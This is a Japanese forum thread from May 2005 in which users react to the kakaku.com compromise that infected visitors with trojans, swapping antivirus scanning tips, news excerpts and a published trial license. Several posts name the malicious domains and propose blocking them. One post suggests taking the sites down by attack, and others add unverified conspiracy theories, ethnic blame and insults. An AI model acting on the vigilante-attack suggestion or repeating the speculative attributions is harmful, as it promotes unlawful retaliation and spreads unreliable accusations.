>
>体験版ファイルをダウンロードし、セットアップマニュアルに従ってインストールしてください。
>ユーザー名、パスワードには、下記をご入力ください。
>ユーザー名:AV-2544986
>パスワード:viu9hcphek
>
>[有効期限2005年5月31日まで]

■もし上からNOD32をダウンロードできなかったらこちらからでもいいかも

NOD32アンチウイルス ダウンロード標準版
http://www.vector.co.jp/soft/win95/util/se288813.html

284 :名無しさん@5周年:2005/05/16(月) 13:02:23 ID:9o0MyMug
NOD32や最新のNortonでウィルス駆除しても安心しない方がイイぞ
価格.comで発表してる2種以外にも検出できないウイルスが仕込まれてる可能性がある。

285 :名無しさん@5周年:2005/05/16(月) 13:02:35 ID:WS9UeFKB
>>267
スマソ、ノートンつーか、シマンテックのサイトのやつのこと。

286 :名無しさん@5周年:2005/05/16(月) 13:02:35 ID:pl0iSr3N
kakakuの利用者多いんだな
俺通販野郎だけど全然使わねえや

287 :名無しさん@5周年:2005/05/16(月) 13:02:54 ID:PVVo30Qo
>>266
なるほどありがd!

288 :名無しさん@5周年:2005/05/16(月) 13:03:16 ID:lxmNr0O+
もし感染していた場合、LAN組んでる他のPCにもうつるんですか?

289 :名無しさん@5周年:2005/05/16(月) 13:03:37 ID:qb/9WRry
>>288
ああ、末広がりだよ!

290 :名無しさん@5周年:2005/05/16(月) 13:03:45 ID:G7MVMwoS
>>220
これ落として今スキャン中なんだけど
これでいいの?なんか更新しろとか言ってますがーみみがー

291 :名無しさん@5周年:2005/05/16(月) 13:04:06 ID:1hybALVv
NOD入れたらすげー重くなる
AMONってのが悪いのか?

292 :名無しさん@5周年:2005/05/16(月) 13:04:13 ID:H+R8eAwf
>>258
そろそろ2時間経つがまだ終わってないw

293 :名無しさん@5周年:2005/05/16(月) 13:04:39 ID:q75C2lEK
んで、この件で影響受けた企業/個人の復旧(調査含む)費用はいくらになるんだろうねぇ〜
ウイルスばら撒いているのを認知しながら運用続けてたんだから、責任の所在は明確だよね?

294 :名無しさん@5周年:2005/05/16(月) 13:05:02 ID:eDYUgkJ2
>>290
>>283のユーザー名とPASS入れれば更新できる

295 :名無しさん@5周年:2005/05/16(月) 13:05:12 ID:1B7EFl0L
>>253
レスありがと!
なるほどそうだったのか。
今からアンインスコでもするか


296 :名無しさん@5周年:2005/05/16(月) 13:05:35 ID:5oc9ocYh
>>225
そう。だから前スレで、このウイルスがFWのプロセスを書き換えた
といっていたヤツに、どのFWなのか、XP標準か、アウポかケリオかゾーンフラームか
ノートンやバスターの標準なんか聞いたけど返答なし。

と、いうか、このウイルスに対処しているのキャノンが、感染症状を
公表すれば何も問題ないし、価格コムは感染して検体を持っているのなら
大手のノートンやバスターに検体を渡したのかと?

もしもそういうことをやらないで、ワケのわからない中途半端な使用期限がついて
ノートンや他のアンチウイルスソフトとの併用を説明書で禁止し、
しかも性能においても使い勝手においても著しく評判の悪い「NOD32」で対処しろなどとは、

それもしかして、そのソフト売りたいだけとちゃうん? と。

297 :名無しさん@5周年:2005/05/16(月) 13:05:41 ID:ZeKUwKsC
>>289
マーヂーデー((((;゚Д゚)))ガクガクブルブル
ヤベエヨヤベエ

298 :名無しさん@5周年:2005/05/16(月) 13:05:52 ID:t/hpOsih
>>541

お姉ちゃんが使った、
タンポンが汚いって言うの?

299 :名無しさん@5周年:2005/05/16(月) 13:05:55 ID:nreiNFk4
>>290
バージョンが1.1097なら問題ない

300 :名無しさん@5周年:2005/05/16(月) 13:06:04 ID:1SzWFQCU
>>277
インターネット・メールくらいしかやらんので、あまりファイルが入ってませんが1時間ちょっとです。
ノートン先生と比べるとやけに速いですね。圧縮ファイルとかちゃんとチェックしてんだろうか・・・

301 :名無しさん@5周年:2005/05/16(月) 13:06:32 ID:KeUUgrMq
>>298

302 :名無しさん@5周年:2005/05/16(月) 13:06:39 ID:xvQwQ4hd
>>296
NODしか対応してなかったからだろ

303 :名無しさん@5周年:2005/05/16(月) 13:06:44 ID:spgKYLf0
ファイヤーウォールの話を必死にしてるそこのカス野郎
お前だよお前


うぜーから死ねよ

304 :名無しさん@5周年:2005/05/16(月) 13:06:53 ID:79NdRXyH
>>296
キャノンはただの代理店でしょ。

305 :名無しさん@5周年:2005/05/16(月) 13:06:57 ID:qvsDUZN1
>>300
ども。1時間すか・・・オレまだ20分も経ってないっすw

306 :名無しさん@5周年:2005/05/16(月) 13:07:12 ID:jIIKsYzd
>>185
これでスキャンしてるんだが、これで発見駆逐できるんだろうな?

307 :名無しさん@5周年:2005/05/16(月) 13:07:29 ID:gyhoJ9jr
鯖落ち  ウイルス祭   会社批判    仮復旧     鯖落ち    あぼーん
 ┝━━━━━┿━━━━━┿━━━━━┿━━━━━┿━━━━━┥
   ∩___∩   /)
   | ノ      ヽ  ( i )))
  /  ●   ● | / /
  |    ( _●_)  |ノ /
 彡、    |∪|    ,/    いまここクマ――!!
  /_ _ヽノ     /´
 (___)     /


308 :名無しさん@5周年:2005/05/16(月) 13:07:33 ID:lkzzCOoz
>>296
っていうかそれしか考えられないだろ?
これでNODを継続して使う一般ユーザーがいたらキャノン(゚д゚)ウマーだからな
さすがに2chのおまいらはアンインストするだろうけどさ

309 :名無しさん@5周年:2005/05/16(月) 13:08:13 ID:ZFyjF344
Internet Explorer では、kakaku.com - nod32j5.exeをダウンロードできません。
サーバーとの接続がリセットされました。

うーん、ネスケじゃないとダメか。


310 :名無しさん@5周年:2005/05/16(月) 13:08:20 ID:G7MVMwoS
>>294
サンクス!
んじゃこれは標準版?!だから消して
体験版入れなおして>283の入れてパス入れればいいのね?ね?ねこ?


311 :名無しさん@5周年:2005/05/16(月) 13:08:48 ID:H+R8eAwf
>>258
今オワタ
56万ファイルで1時間50分

312 :名無しさん@5周年:2005/05/16(月) 13:08:49 ID:elAEorLZ
トロイでgetした情報は価格.comに有るの?

313 :名無しさん@5周年:2005/05/16(月) 13:08:58 ID:2tCCIPEL
だからあれほどFirefoxを使えと

314 :名無しさん@5周年:2005/05/16(月) 13:09:38 ID:FbvE4JIk
もしかしてNOD32タイアップ企画でしたか?

315 :298:2005/05/16(月) 13:10:21 ID:t/hpOsih
スイマセン
誤爆しました。

316 :名無しさん@5周年:2005/05/16(月) 13:10:28 ID:lkzzCOoz
さすが無料ソフトのSpybotに値段つけて売ってる会社ですね

317 :名無しさん@5周年:2005/05/16(月) 13:10:39 ID:jZw7NCQf
>>258
1時間10分
>>270
(・∀・)人(・∀・)ナカーマ

318 :名無しさん@5周年:2005/05/16(月) 13:10:50 ID:QYiFpxOp
NOD32英語体験版では検出されず。
いまBDでスキャン中。

319 :名無しさん@5周年:2005/05/16(月) 13:11:43 ID:Js6otQWE
http://pc.to-i-ki.com/

スパマーうざい

320 :名無しさん@5周年:2005/05/16(月) 13:11:43 ID:htiPbfd9
ウイルスバスター(トレンドマイクロ)は13:10現在、未だに未対応。

このスレの1か2あたりで、バスターのオンラインスキャンをありがたがってるオッサンどもがいたが、
未対応なんだから、いくらスキャンしても何も反応しねーってw

321 :名無しさん@5周年:2005/05/16(月) 13:11:56 ID:qvsDUZN1
>>311
ども。参考になります。

>>313
日本での認知度が低すぎですよね。 そのくせOpera知ってるヤツ多いってのが・・・

322 :名無しさん@5周年:2005/05/16(月) 13:12:07 ID:79NdRXyH
>>313
FireFoxをまともに使えるように設定するのと、IE系タブブラウザを安全に使う手間を比べれば
IE系使ってた方が遥かに楽で、遥かにわかり易い。

323 :名無しさん@5周年:2005/05/16(月) 13:12:33 ID:3mLoeuHp
>>299
バージョンが1.1097でも、括弧の中の日付が去年の12月とかなら
駄目でわ?

324 :名無しさん@5周年:2005/05/16(月) 13:12:33 ID:eDYUgkJ2
>>310
両方ともものは一緒だった
ハッシュで確認

325 :名無しさん@5周年:2005/05/16(月) 13:13:07 ID:xOLff2tL
今回の事件、NOD32を販売している所が起こしていたりして。

326 :名無しさん@5周年:2005/05/16(月) 13:13:35 ID:ZWEO+UtX
>>313
もっさりだからやだ。

327 :名無しさん@5周年:2005/05/16(月) 13:13:40 ID:WS9UeFKB
感染しているかどうか、
確かめる方法はあるのかい?

328 :名無しさん@5周年:2005/05/16(月) 13:14:27 ID:0U+1o7S5
12:46
取引値 916,000
前日比 -42,000 (-4.38%)
前日終値 958,000
出来高 1,202
時価総額 43,093百万円

329 :名無しさん@5周年:2005/05/16(月) 13:14:34 ID:1hybALVv
やっぱAMON切ったら元にもどった
ところで本体のバージョンはどうやって確認するんだ?

330 :名無しさん@5周年:2005/05/16(月) 13:14:41 ID:gThSC3T5
もし感染していたと仮定して、
「システムの復元(WinXP SP2)」で以前の状態に戻した場合、
感染していない状態になるのかな。
それとも完全に初期状態に戻さないと駄目なのかな。

331 :258:2005/05/16(月) 13:14:45 ID:qvsDUZN1
>>317
早いっすねー

332 :名無しさん@5周年:2005/05/16(月) 13:15:11 ID:Vfs/OLvo
【二重ハッキング】 NODがウイルス入りに差し替えられて 【カカクコム】
http://news18.2ch.net/test/read.cgi/news7/1114531384/

333 :名無しさん@5周年:2005/05/16(月) 13:15:19 ID:8yKg3dDH
価格.comがハッキングでサイト改ざん。価格comを見ていたらウイルス感染の可能性。
メアド流出も?

Yahooニュースにも出ていたが価格.comがハッキングを受けたため閉鎖され、現在はWEBサーバーを
変更して告知文を掲示しているが、日経コンピューターによると、価格コムを11日〜14日にかけて閲覧したPCは
2種類のウイルスに感染している恐れがあるとのこと。

…価格comは11日の時点でなんらかの認識をしていたようなので、11日の時点でサイト閉鎖しなかったのは、
閲覧者のウイルス感染の可能性を増やしたことになるので、マズイ感じ。

ttp://blog.livedoor.jp/geek/archives/22135194.html (アキバBlog)

334 :名無しさん@5周年:2005/05/16(月) 13:15:30 ID:5oc9ocYh
★★★★★★★★★★★★★★★★★★★★
現状の最善な対処法。

・ノートンなどと併用しても問題ないBitDefender Free Editionを導入
http://www.altech-ads.com/product/10000839.htm
・パターンファイル更新後、全スキャン。

・ウイルスを発見したら削除
今回問題のウイルスの名称は (BehavesLike:Win32.AV-Killer)

・常設機能が切れる頃には、ノートンやバスターが対処していると
 思われるので、BitDefender Free Editionアンインストール。
★★★★★★★★★★★★★★★★★★★★

これで問題なし。

※価格コムが推奨しているNOD32について
 
 NOD32はノートンやバスターなどの他のアンチウイルスとの併用が
 出来ません。説明書で他のアンチウイルスソフトウェアをアンイストール
 してからインストールするように間いてあります。併用すると不具合
 発生の危険あり。

335 :名無しさん@5周年:2005/05/16(月) 13:15:56 ID:XTJs91Sq
FireFoxなら問題なし?

336 :名無しさん@5周年:2005/05/16(月) 13:15:58 ID:ah4mpDvA
>>255
ということはj4sb.com と shtm1.com と 0x61.com にブラウザでアクセスさせないように
しとけばいいって子とだね。
早速ProxomitronのブロックURLに加えとくよ

逆に言えばそのサイトを攻撃などでダウンさせちゃえば安心ってことだよ。
自分だけじゃなくて、すべての人が。

337 :名無しさん@5周年:2005/05/16(月) 13:16:06 ID:PdLq5mhB
このウィルスってクレカの情報も漏れるの?

338 :名無しさん@5周年:2005/05/16(月) 13:16:37 ID:7D/vRQyU


  NODかわいいよNOD



339 :名無しさん@5周年:2005/05/16(月) 13:17:03 ID:ZeKUwKsC
そしてまた田代砲が炸裂

340 :名無しさん@5周年:2005/05/16(月) 13:17:45 ID:NV7WW1sn
>>All
安心しろ
閲覧者の情報は、既に侵入者のHDDに保存されてる

悪いのはコンセント抜くのが遅かったカカクコムだ


341 :名無しさん@5周年:2005/05/16(月) 13:17:56 ID:G7MVMwoS
>>324
じょもじょも
なんかそんな感じみたいでつね。
何故かプログラムファイルが除外されてしまいましたが
システムの方すきゃんしてくれるだけでだいじょぶ?じょぶ?ん?job?

342 :名無しさん@5周年:2005/05/16(月) 13:18:51 ID:MOmL6bcC
>>335
Firefox 1.03で閲覧してたけど感染しなかったよ。

343 :名無しさん@5周年:2005/05/16(月) 13:19:18 ID:gyhoJ9jr
>>338
価格ドットコムが落ちた件について
http://pc8.2ch.net/test/read.cgi/sec/1116173150/281


344 :名無しさん@5周年:2005/05/16(月) 13:19:20 ID:Y8Vb0iZd
ID:5oc9ocYh キチガイすぎ 相手にするな

345 :名無しさん@5周年:2005/05/16(月) 13:19:28 ID:ah4mpDvA
>>337
もちろん、中国に送っているとかんがえるべき。

346 :名無しさん@5周年:2005/05/16(月) 13:19:41 ID:lkzzCOoz
>>342
1.03はバグあるから、とっとと1.04に汁

347 :名無しさん@5周年:2005/05/16(月) 13:19:45 ID:ZOjPWrCo
>>298
ロングパスワロタ

348 :名無しさん@5周年:2005/05/16(月) 13:19:48 ID:nlC1HyRf
良かった感染なし
無駄にかかった時間の賠償を>トラブル抱え込む

349 :名無しさん@5周年:2005/05/16(月) 13:20:03 ID:d/HF24eb
犯罪の温床だもんな。価格コム。
盗難品、クレジットカード金融で質入したものを
現金化してる輩もいるし。ヤフオクよりひどい
きこり、とかいうキチガイもいるし

350 :名無しさん@5周年:2005/05/16(月) 13:20:19 ID:rczNRBjm
実はウイルス対策ソフト各社との壮大な共謀計画とか

351 :名無しさん@5周年:2005/05/16(月) 13:20:26 ID:Mzz7vhXW
メインとサブ2台持ってるけど、ウィルス見つかったのはサブの方だけ
で、メインの方は大丈夫なようだ。。
同じようにサイト閲覧してたんだけど、不思議・・・。

352 :名無しさん@5周年:2005/05/16(月) 13:20:35 ID:F2LnTQfV
このウイルスにやられたら具体的にどうなるのかを書いておけよ。
いちいちハードディスク全部スキャンなんかやってられるかよ。

353 :名無しさん@5周年:2005/05/16(月) 13:20:38 ID:V/rwh+g5
まとめサイトにノートン先生は5月15日付けのパターンでは
検出できないと書いてあるが・・・・
頼むよ、ノートン先生。



でもFire Foxでは感染しないということは、Mozillaの最新版を使っていた
俺はセーフなのかな?

354 :名無しさん@5周年:2005/05/16(月) 13:20:41 ID:pCBCNS6C
5月11日にプログラムの異常が発覚。調査したところ不正アクセスが原因であり、一種の
サイバーテロ的な行為であると認識しました。

NOD32定義ファイル: 1.1093 (20050511)
略〜Win32/PSW.Delf.FZ〜略

何故日付が同じなんだろ・・・

355 :名無しさん@5周年:2005/05/16(月) 13:21:17 ID:Yeb7PlB0
価格からNOD32をDLしようとしても最後までDLしてくれないのはなぜ??
まだ20%もいってないのに完了!!とかほざいてる。

356 :名無しさん@5周年:2005/05/16(月) 13:21:20 ID:gyhoJ9jr
>>349
いやヤフオクも似たようなもんだろ。
上納金がどこに入るかの違いぐらいじゃね?


357 :名無しさん@5周年:2005/05/16(月) 13:21:34 ID:xvQwQ4hd
>>334
NODに限らず普通はウイルス対策ソフトは複数入れちゃだめだぞ

358 :名無しさん@5周年:2005/05/16(月) 13:22:00 ID:5oc9ocYh
>>344
お前がもしもキャノンの社員だったり、価格コムの関係者なら悪質すぎるぞ。
日本で最大のシェアを誇るノートンやバスターとの併用が出来ない
アンチウイルスソフトを薦めて、それ以外の安全な対処をキチガイよばわりか?

いいかげんにしろって。

359 :名無しさん@5周年:2005/05/16(月) 13:22:17 ID:iDu4DMQC
>>355
>>220

360 :名無しさん@5周年:2005/05/16(月) 13:22:17 ID:+rSHBy0g
>>336
Proxomitron使いハケーン
漏れも登録しますた!


361 :名無しさん@5周年:2005/05/16(月) 13:22:30 ID:nreiNFk4
>>355
ダウンロードつーる使え

362 :名無しさん@5周年:2005/05/16(月) 13:22:32 ID:lkzzCOoz
>>355
たぶんアクセス集中して鯖がパンクしてるんだと思う
VectorからDLすべし

363 :名無しさん@5周年:2005/05/16(月) 13:22:59 ID:Y8Vb0iZd
>>357
だから単なるバカの宣伝屋に相手するな ID追っただけで脱力したし。

364 :名無しさん@5周年:2005/05/16(月) 13:23:38 ID:HuIxrq3i
ライブドアも似たようなサイトを持ってるらしい。
つまり豚が・・。

365 :名無しさん@5周年:2005/05/16(月) 13:23:55 ID:MOmL6bcC
>>346
さっき1.04にしたよ。

366 :名無しさん@5周年:2005/05/16(月) 13:24:07 ID:8yKg3dDH
価格.comが一時閉鎖、不正アクセスでトロイの木馬を仕込まれる 閲覧したユーザーはウイルス感染の恐れも

 カカクコムは15日、同社の価格比較サイト「価格.com」で不正アクセスがあったことを発表した。現在、
「セキュリティ対策を施すため」サイトを一時閉鎖している。サイトの復旧には、1週間程度かかる模様だ。

 カカクコムによれば、5月11日に不正アクセスによる価格.comの改竄が発覚。「この改竄により、何者かが
価格.comを媒介としてウイルスを無差別に送りつけ、価格.comを閲覧したユーザーがウイルスを取込んで
しまった可能性がある」という。

 判明しているウイルスは「trojandownloader.small.AAO」「PSW.Delf.FZ」の2種類。キヤノンシステムソリューションズが
販売するウイルス対策ソフト「NOD32」にて検知・駆除が可能だ。カカクコムでは「そのほかのセキュリティソフト各社にも
対応を確認中であり、判明次第ご報告させて頂きます」としている。

ttp://internet.watch.impress.co.jp/cda/news/2005/05/16/7599.html (INTERNET Watch)

367 :名無しさん@5周年:2005/05/16(月) 13:24:12 ID:8vTuJ+Uy
NOD32使って、ウィルス発見された _| ̄|○
駆除後、再検査。

検出されたウイルス数:0

信 じ て 良 い ん で す よ ね ?

価格コム、被害者面が出来るのは今だけだぞ。
つーか、対応がふざけすぎ。

368 :名無しさん@5周年:2005/05/16(月) 13:24:51 ID:F2LnTQfV
他のウイルスソフトをのプリインストールしているような初心者さんがインストールしたらどう責任をとるんだろう?

369 :名無しさん@5周年:2005/05/16(月) 13:24:54 ID:wSFDCDvZ
>ウイルス対策ソフト「NOD32」で対処が可能なことを確認

ほかのメジャーなソフト名も出さないと、壮大なマッチポンプとして認定されるぞ。

370 :名無しさん@5周年:2005/05/16(月) 13:24:58 ID:5oc9ocYh
>>357
ノートン+BitDefender Free Edition
バスター+BitDefender Free Edition

どちらも個別環境で問題なしと確認済みの上ですのでご心配なく。
環境はVMware Workstationでのw2kとXP。

緊急対処後もアンインスコで問題なし。

371 :名無しさん@5周年:2005/05/16(月) 13:25:10 ID:K11jgVG4
NOD併用だめでアンインストールしないとだめなの?AVGは今起動させてなけど

372 :名無しさん@5周年:2005/05/16(月) 13:25:12 ID:OZJqzQaR
そういやどの製品についても、買ってもいないのに蘊蓄をたれる奴がいて
それにウンザリして見なくなったな
確か手マンとかいう奴だったか。

373 :名無しさん@5周年:2005/05/16(月) 13:25:25 ID:Gpf+ZSgC
>>357
常駐するのを複数入れなければ良いんじゃないか?
セキュ板ではAVG&BitDefenderの組み合わせは普通に使われているが。

374 :名無しさん@5周年:2005/05/16(月) 13:25:25 ID:qb/9WRry
>>368
やっべやっべ

375 :名無しさん@5周年:2005/05/16(月) 13:25:42 ID:+VguF0Vj
>>336
4月に台湾でも被害にあったようなのだが、中国語が読めん。誰か...

ttp://groups.google.com/groups?q=shtm1.com&hl=ja&lr=&safe=off&selm=D0185993-1CB9-4E95-B360-D214C4FF1A32%40microsoft.com&rnum=1


376 :名無しさん@5周年:2005/05/16(月) 13:25:47 ID:eDYUgkJ2
>>369
現状では他のメジャーどころが未対応っぽいんだよねー

377 :名無しさん@5周年:2005/05/16(月) 13:25:58 ID:L3WNo3lU
ノートンの社員もウザイ

378 :名無しさん@5周年:2005/05/16(月) 13:26:07 ID:nreiNFk4
>>367
検査対象のオプション全部チェックいれてやったのか?
2つみつかったんならとりあえず大丈夫

379 :名無しさん@5周年:2005/05/16(月) 13:26:57 ID:F2LnTQfV
ノートンはアンインストしてもゴミが残るしなぁ。

380 :名無しさん@5周年:2005/05/16(月) 13:27:36 ID:Yeb7PlB0
>>362
サンクスっといいたいけど、体験版なぃ・・・

381 :名無しさん@5周年:2005/05/16(月) 13:27:41 ID:pl0iSr3N
そこで北斗の拳ですよ

382 :名無しさん@5周年:2005/05/16(月) 13:27:43 ID:5DzMGf/I
日経にも載ったじゃんw
http://it.nikkei.co.jp/it/news/index.cfm?i=2005051601108j0

383 :名無しさん@5周年:2005/05/16(月) 13:27:51 ID:ONssYlGC
ノートンからおとしてきたパターンファイルがインストールできねー

384 :名無しさん@5周年:2005/05/16(月) 13:28:05 ID:zSq1lC8P
これもいいぞ

RegSeeker v1.35 beta build 1203
ttp://www.hoverdesk.net/freeware.htm
RegSeeker 日本語化パッチ
ttp://downloads.at.infoseek.co.jp/

385 :名無しさん@5周年:2005/05/16(月) 13:28:38 ID:5oc9ocYh
>>363
無料ソフトを宣伝するバカがどこにいるか説明してくれないか?
まじでキャノンの社員が沸いてないかこのスレ?

386 :名無しさん@5周年:2005/05/16(月) 13:28:49 ID:lTqrGefT
スーパーハカーコワス

387 :名無しさん@5周年:2005/05/16(月) 13:28:52 ID:eDYUgkJ2
>>380
中身同じっす。

388 :名無しさん@5周年:2005/05/16(月) 13:28:52 ID:ZWEO+UtX
価格コムに登録してたメールにスパムくるんだけど、皆さんはどう?

389 :名無しさん@5周年:2005/05/16(月) 13:28:55 ID:SLAaKy7Y
バスターの対応遅くないですか????


390 :名無しさん@5周年:2005/05/16(月) 13:29:07 ID:gyhoJ9jr
>>379
それで死んだことあるよ。
以前ノートン入れてたの知らないで、VB入れてしまった。
立ち上がってVB走るとブルーバック。
結局レジストリいじってなんとかなったが、半日潰れたよ。

391 :名無しさん@5周年:2005/05/16(月) 13:29:59 ID:jG+aNbiR
この前の事件のお詫びを込めて
こういうときこそバスターが早く対応してもらいたいと



392 :名無しさん@5周年:2005/05/16(月) 13:30:20 ID:jIIKsYzd
>>384
漢専用じゃねぇかw

393 :名無しさん@5周年:2005/05/16(月) 13:30:43 ID:5bNDvtq0
謝罪と賠償要求するつもりなら、個人レベルで修復しなくてもいいんじゃね?
直し方わかんね〜とか言って最後までごねたほうがいいぞ。
quoカード500円もらえるかもよ。

それにしても、このウィルスに関する詳細情報も掲載できねぇのかこの糞会社。

394 :名無しさん@5周年:2005/05/16(月) 13:30:47 ID:gyhoJ9jr
>>391
1ヶ月ライセンス延びたじゃん。それで終了。

395 :名無しさん@5周年:2005/05/16(月) 13:30:56 ID:Yeb7PlB0
>>387
いけました。サンクスです

396 :名無しさん@5周年:2005/05/16(月) 13:31:10 ID:iDu4DMQC
>>391
と急いで定義ファイル更新してまたもや(ry

397 :名無しさん@5周年:2005/05/16(月) 13:31:39 ID:8pdIx/xD
「定義を更新しろ」って言われるんだけど、どうやって更新するの?
>>283のユーザー名とPASSはインストールの時に入れたんだけど・・・

398 :名無しさん@5周年:2005/05/16(月) 13:31:40 ID:CEFew/jx
>>79
ほんとその通りだ
今知ってあちこち見ている

399 :名無しさん@5周年:2005/05/16(月) 13:31:53 ID:gyhoJ9jr
>>393
VBの時は、修復費用払いますって話も出たが、kakakuにはそこまで体力ないだろ?

400 :名無しさん@5周年:2005/05/16(月) 13:32:18 ID:8vTuJ+Uy
>>378
ん。検査対象は全部チェックしますた。
メモリ常駐のヤツと、ファイルの方。両方、見つかりました。

再起動とチェックを何度やったか・・。

401 :名無しさん@5周年:2005/05/16(月) 13:32:30 ID:UQXfUShM
さっさと会社解散しろ〜

402 : ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄:2005/05/16(月) 13:32:40 ID:V/RRNlwl
          ∬
        ∧__∧         
    || <#`Д´> ||   
.   |||||( |   | | |||||   
.  从_从| |   | |从_从
  __  | |   | |   バァ−−−−−ン!!
  \  ⊂ノ ̄ ̄_つ ̄ ̄\
  ||\             \
  ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
  ||  || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
     .||             ||

403 :名無しさん@5周年:2005/05/16(月) 13:33:10 ID:8yKg3dDH
カカクコム:不正アクセスでサイトを一時閉鎖

 日本最大の価格比較サイトのカカクコムは16日、不正アクセスのためサイトを一時閉鎖したと発表した。
11日に不正アクセスがあり、利用者のコンピューターにウイルスが配布されるようなプログラムの改ざんが
行われたことを確認。同社はプログラムを修正したものの、再三にわたりプログラムの改ざんが繰り返されたため、
14日からサイトを一時閉鎖した。完全な防御策を施すため、サイトの再開は1週間後の予定。

 また、不正アクセスにより一部の利用者のメールアドレスが閲覧された可能性もあるという。同社によると、
利用者の被害は報告されていない。

 同社は11日に警視庁に被害届を提出した。

ttp://www.mainichi-msn.co.jp/it/computing/news/20050516k0000e040072000c.html (MSN-Mainichi INTERACTIVE)

404 :名無しさん@5周年:2005/05/16(月) 13:33:23 ID:2uHJOdou
>401-402
素敵!

405 :名無しさん@5周年:2005/05/16(月) 13:33:24 ID:YP8z7/Sb
>>388
こんなのあったけど
http://pc8.2ch.net/test/read.cgi/sec/1116173150/74-75n

406 :名無しさん@5周年:2005/05/16(月) 13:33:37 ID:jMwXRzFG
>>397
常駐アプリの欄に出てるでしょ。NOD
そこを右クリックすればなんか出てくるから、そこからアップでーと

407 :名無しさん@5周年:2005/05/16(月) 13:33:50 ID:m3NzY11O
トレンドマイクロが先日の汚名挽回を目指し対応に必死になり

焦ってバグの残ったファイルをうpして再度大騒ぎ!

とかなる気が...w



408 :名無しさん@5周年:2005/05/16(月) 13:34:18 ID:OqdarcJ+
NOD32入れて今、検査中だけど、終わるのにどれくらいかかるんだ?
HDDが合計400GBあるんだが・・・・

409 :名無しさん@5周年:2005/05/16(月) 13:34:28 ID:5ZYDxLOz
>改ざんにより、悪意の第三者が当社サイトを媒介としてウィルスソフトを無差別に送りつけ、

悪意の第三者・・・
これって「故意ではなく送りつけてしまった」ってこと?
言葉がおかしいんじゃない?

410 :名無しさん@5周年:2005/05/16(月) 13:34:57 ID:u+rCatVi
ウィルスバスター使ってて、NOD32もBitDefenderも落としたんだが、
両方インスコしない方がいいみたいで、どーすりゃいいんだ?

411 :名無しさん@5周年:2005/05/16(月) 13:35:11 ID:8R36m3W8
>>389
いいとこみせるチャンスなのにな

412 :名無しさん@5周年:2005/05/16(月) 13:35:15 ID:iDu4DMQC
>>409
ハァ?

413 :名無しさん@5周年:2005/05/16(月) 13:35:50 ID:+rSHBy0g
BitDefender(非常駐のみ)とAntiVir(常駐あり)の無料コンビ
ずっと使ってるけど問題出てないよ

ちなみにBitDefender無料版のトレイアイコンはただの管理用で
常駐検査はしてないから、誤解しちゃだめだよ

常駐を一種類だけにしとけば、複数のウイルスソフト入れても
まず大丈夫だと思うんだが…


414 :名無しさん@5周年:2005/05/16(月) 13:35:57 ID:ZeKUwKsC
>>379 >>380

そう言えばPC購入時に付いてきたノートンをインスコして即アンインスコした記憶がある…
今この時点で他のアンチウィルスソフトインスコすると危なそうだ

どうすりゃいんだ('A`)

415 :名無しさん@5周年:2005/05/16(月) 13:36:14 ID:RAH5q4gL
>17
禿しく亀でスマンが、来たよ!
めったに来ないのに、おかしいと思ってたんだよ!!
価格comに登録したメアドだよ・・orz

416 :名無しさん@5周年:2005/05/16(月) 13:36:31 ID:5AI+Kcef
>>409
あんた頭がおかしいんじゃないの?

417 :名無しさん@5周年:2005/05/16(月) 13:36:44 ID:NiCn6sYh
悪意は「その事について知っている」
善意が「その事について知らない」

418 :名無しさん@5周年:2005/05/16(月) 13:36:45 ID:e8xq0VJ9
 
 
大 中 華 帝 国 に 逆 ら う か ら こ う な る ん だ よ www
 
 

419 :名無しさん@5周年:2005/05/16(月) 13:36:50 ID:ah4mpDvA
>>350
>>255
255 名前:名無しさん@5周年[] 投稿日:2005/05/16(月) 12:57:16 ID:+VguF0Vj

犯人は中国(おそらく北京)の反日組織です。証拠を発見しました。

スクリプトの拡張子が普通じゃないのに注目して、"count/counter.ap?id="をググってみると、

ttp://www.google.com/search?q=%22count%2Fcounter.ap%3Fid%3D%22

j4sb.com以外に shtm1.com と 0x61.com が同じスクリプトを走らせていることが分かります。
whoisでこれらのサイト情報を検索すると

ttp://whois.ansi.co.jp/?key=shtm1.com
ttp://whois.ansi.co.jp/?key=0x61.com

Admin Name........... pi ger
Admin Address........ hidden
Admin Address........
Admin Address........ Beijing
Admin Address........ 123456
Admin Address........ BJ
Admin Address........ CN
Admin Email.......... fuckjpmm@china.com
Admin Phone.......... +86.1012345678
Admin Fax............ +86.1012345678

と出てきます。 fuckjpmm とは "Fuck Japanese!" 
どう見ても反日です。

420 :名無しさん@5周年:2005/05/16(月) 13:37:12 ID:jMwXRzFG
>>408
でかい容量のファイルは飛ばすらしいから
そう時間かからんと思われ。
ちっこいファイルがいっぱいならわからんけど。

421 :名無しさん@5周年:2005/05/16(月) 13:37:26 ID:JSo2gKgF
>>10
あった orz

firefoxで価格comを見てたんだけど、やばいのかな?
ノートンは入れてます。

422 :名無しさん@5周年:2005/05/16(月) 13:38:31 ID:IlE2Q8CP
>>407
汚名挽回・・・

423 :名無しさん@5周年:2005/05/16(月) 13:39:05 ID:+rSHBy0g
>>410

ウイルスバスターとNOD32は両方とも常駐型だから、
NOD32使う間はウイルスバスターの常駐切っとかないとトラブるかもね


424 :名無しさん@5周年:2005/05/16(月) 13:39:28 ID:rn6va6vX
>>368
その辺の説明ないしマジで心配する
二次災害起きるんじゃない?

425 :名無しさん@5周年:2005/05/16(月) 13:39:49 ID:wVe7d61x
>>10
よかったなかった


426 :名無しさん@5周年:2005/05/16(月) 13:39:54 ID:I+g2WF56
>>422
名誉返上の間違いじゃね?
俺頭よくね?

427 :名無しさん@5周年:2005/05/16(月) 13:40:26 ID:sJUUVdjp
■暫定まとめサイト

価格.comがクラッキングで一時閉鎖、閲覧ユーザーはウイルス感染も(´・ω・)
http://musyoku-waste.hp.infoseek.co.jp/test/index.htm

■価格.com(http://kakaku.com/)より抜粋

>NOD32アンチウイルス体験版ダウンロード(Windowsユーザーのみ)
>http://kakaku.com/nod32j5.exe
>
>セットアップマニュアル(PDF)
>http://kakaku.com/nod32trial_man.pdf
>
>体験版ファイルをダウンロードし、セットアップマニュアルに従ってインストールしてください。
>ユーザー名、パスワードには、下記をご入力ください。
>ユーザー名:AV-2544986
>パスワード:viu9hcphek
>
>[有効期限2005年5月31日まで]

■もし上からNOD32をダウンロードできなかったらこちらでもいいかも

NOD32アンチウイルス ダウンロード標準版
http://www.vector.co.jp/soft/win95/util/se288813.html


